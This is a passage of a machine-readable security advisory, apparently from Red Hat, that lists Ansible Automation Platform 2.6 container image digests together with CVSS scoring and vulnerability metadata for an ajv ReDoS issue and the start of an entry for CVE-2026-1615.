"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-1615",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-02-09T11:10:57.572082+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
